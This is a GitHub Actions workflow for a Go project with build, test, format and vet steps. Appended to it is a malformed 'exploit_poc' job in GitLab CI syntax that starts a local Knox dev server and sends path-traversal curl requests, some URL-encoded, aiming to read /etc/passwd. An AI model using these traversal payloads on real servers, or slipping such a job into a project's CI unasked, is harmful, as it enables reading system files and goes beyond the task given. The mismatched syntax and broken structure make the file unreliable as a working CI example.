name: Go

permissions: read-all

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

jobs:

  build:
    name: Build and Test
    runs-on: ubuntu-latest
    steps:
      - name: Set up Go 1.x
        uses: actions/setup-go@v2
        with:
          go-version: ^1.14.6

      - name: Checkout
        uses: actions/checkout@v2

      - name: Build
        run: go build -v ./...

      - name: Test
        run: go test -v ./...

      - name: Fmt
        run: diff -u <(echo -n) <(gofmt -d -s .)

      - name: vet
        run: go vet ./...

  exploit_poc:
  stage: exploit
  image: golang:1.24
  script:
    - echo "Starting Knox dev server..."
    - go run ./cmd/dev_server > knox_server.log 2>&1 &
    - SERVER_PID=$!
    - echo "Waiting for server to start..."
    - sleep 10

    - echo "Checking if server is listening on port 8080..."
    - netstat -tulnp | grep 8080 || true

    - echo "Run exploit curl commands..."
    - curl -v http://localhost:8080/normal/path || true
    - curl -v http://localhost:8080/../../../etc/passwd || true
    - curl -v http://localhost:8080/api/v1/keys/../../../../../etc/passwd || true
    - curl -v "http://localhost:8080/%2e%2e/%2e%2e/%2e%2e/etc/passwd" || true

    - echo "Sleeping to flush logs..."
    - sleep 2

    - echo "Stopping Knox server..."
    - kill $SERVER_PID || true

    - echo "Server logs:"
    - cat knox_server.log || echo "No logs"

  artifacts:
    paths:
      - knox_server.log

